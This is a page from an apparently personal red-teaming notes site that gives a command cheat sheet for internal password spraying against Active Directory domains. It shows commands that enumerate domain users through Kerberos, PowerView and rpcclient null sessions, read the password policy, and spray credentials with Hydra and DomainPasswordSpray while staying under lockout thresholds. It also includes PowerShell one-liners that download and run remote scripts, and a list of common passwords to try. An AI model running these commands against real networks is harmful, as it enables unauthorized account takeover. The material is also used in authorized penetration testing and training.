🐧
Hassan Saad
  • WHO AM I ?
  • Red Teaming
    • C2 Infrastructure
    • External Reconnaissance
    • Initial Compromise
      • Executable File (EXE)
      • HTML Application (HTA)
      • Visual Basic (VBA Macros)
      • Password Spraying
      • MITM Attack
      • Email Spoofing
    • Host Reconnaissance
      • Seatbelt
      • Screenshots & Keylogging
    • Host Persistence
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM Hijacking
    • Host Privilege Escalation
      • Automated Tools
      • Unquoted Service Path
      • Weak Service Permission
      • Weak Service Binary
      • Always Install Elevated
      • UAC Bypass
    • Domain Reconnaissance
      • PowerView
      • BloodHound
      • Linux Host
      • Internal Applications
    • Lateral Movement
      • PowerShell Remoting
      • PsExec
      • WMI
      • DCOM
    • Credentials Access
      • LogonPasswords
      • Security Account Manager (SAM)
      • Domain Cached Creds
      • Kerberos Tickets
      • DPAPI
      • User Impersonation
      • Pass The Hash
      • Over Pass The Hash
      • Internal Password Spraying
      • Sniffing
      • NTLM Relay
    • Pivoting & Forwarding
      • SOCKS Proxy
      • Reverse Port Forwards
      • Local Port Forwards
      • Session Passing
      • P2P Listeners
      • NTLM Relay
    • Kerberos
      • Authentication
      • Kerberoasting
      • ASREP-Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Linux Credential Cache
    • Group Policy
      • Enumeration
      • RSAT (GPMC)
      • Sharp GPO Abuse
    • Access Control Lists (DACL)
      • GenericAll
      • WriteDacl
      • WriteOwner
    • MS SQL Servers
      • Enumeration
      • NetNTLM Capture
      • Command Execution
      • Lateral Movement
      • Privilege Escalation
    • Domain Dominance
      • DCSync Backdoor
      • AdminSDHolder
      • Remote Registry Backdoor
      • Skeleton Key
      • Silver Ticket
      • Golden Ticket
    • Forest & Domain Trusts
      • Parent/Child
      • One Way (Inbound)
      • One Way (Outbound)
    • Evasion Techniques
      • Obfuscation
      • Process Injection
      • LAPS
      • AppLocker
      • PowerShell Constrained Mode
      • AMSI
      • Antivirus Exclusion
  • Penetration Testing
    • Information Gathering
    • Scanning
    • Exploitation
    • Post Exploitation
    • Password Attacks
    • Web Attacks
    • Exploit Development
  • Technology Essentials
    • Linux
      • Basics
      • Tasks
    • Windows
      • Basics
      • Tasks
    • Network
      • Basics
      • Tasks
    • Programming
      • Basics
      • Tasks
  • Bug Hunting
    • XSS on Nokia
    • XSS on Wuzzuf
    • Business Logic Flaw on Souq (Amazon Company)
    • Rate Limit Bypass on LinkedIn
    • Sensitive Data Exposure on Google
  • Tools
    • Recon Hunter
    • Mail Hunter
    • Mobile Hunter
    • Chimera (Threat Hunter)
  • Extras
    • SQL Injection
    • Web Basics
    • Mobile Testing
      • Mobile Testing 1
      • Mobile Testing 2
      • Mobile Testing 3
Powered by GitBook
On this page
  1. Red Teaming
  2. Credentials Access

Internal Password Spraying

Internal Password Spraying

Get domain users using Kerberos

dig _ldap._tcp.dc._msdcs.Domain_Name // Find Domain Controller
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=users.txt 10.196.1.13

Get domain users using powerview

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1");
Get-DomainUser | select samaccountname > users.txt

Get domain users using rpcclient

nmap -Pn -sS -p389,88 --open 10.10.0.0/16 // Find Domain Controller

rpcclient -U "" -N 10.10.1.50 // Authenticate Using Null Session
rpcclient -U "MEGA\hsaad" 10.10.1.50 // Authenticate Using Domain User & Password
>> enumdomusers // Enumerate All Domain Users

Get domain password policy using powerview

(Get-DomainPolicy)."SystemAccess"

Get domain password policy using rpcclient

>> getdompwinfo

Password Spraying Using Hydra

Don't forget the lockout threshold if it exists, for example, if it set for 5 tries in 30 minutes, then can only try 4 failed attempts on every account every 30 minutes.

hydra -V -L users.txt -P pass.txt -m MEGA.local -t 1 10.10.1.50 smb
hydra -V -L users.txt -e nsr -m MEGA.local -t 1 10.10.1.50 smb

Password Spraying Using DomainPasswordSpray

By default, the tool will enumerate the users in the domain, then will filter from them any disabled account or any account that reaches the limit of the lockout.

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/dafthack/DomainPasswordSpray/master/DomainPasswordSpray.ps1");
Invoke-DomainPasswordSpray -Password Spring2017
Invoke-DomainPasswordSpray -UserList users.txt -PasswordList passlist.txt

Common Passwords

12345
123456
123456789
P@ssw0rd
P@ssword
P@ssword@123
password@123
Company_name@123
admin@123
PreviousOver Pass The HashNextSniffing

Last updated 2 years ago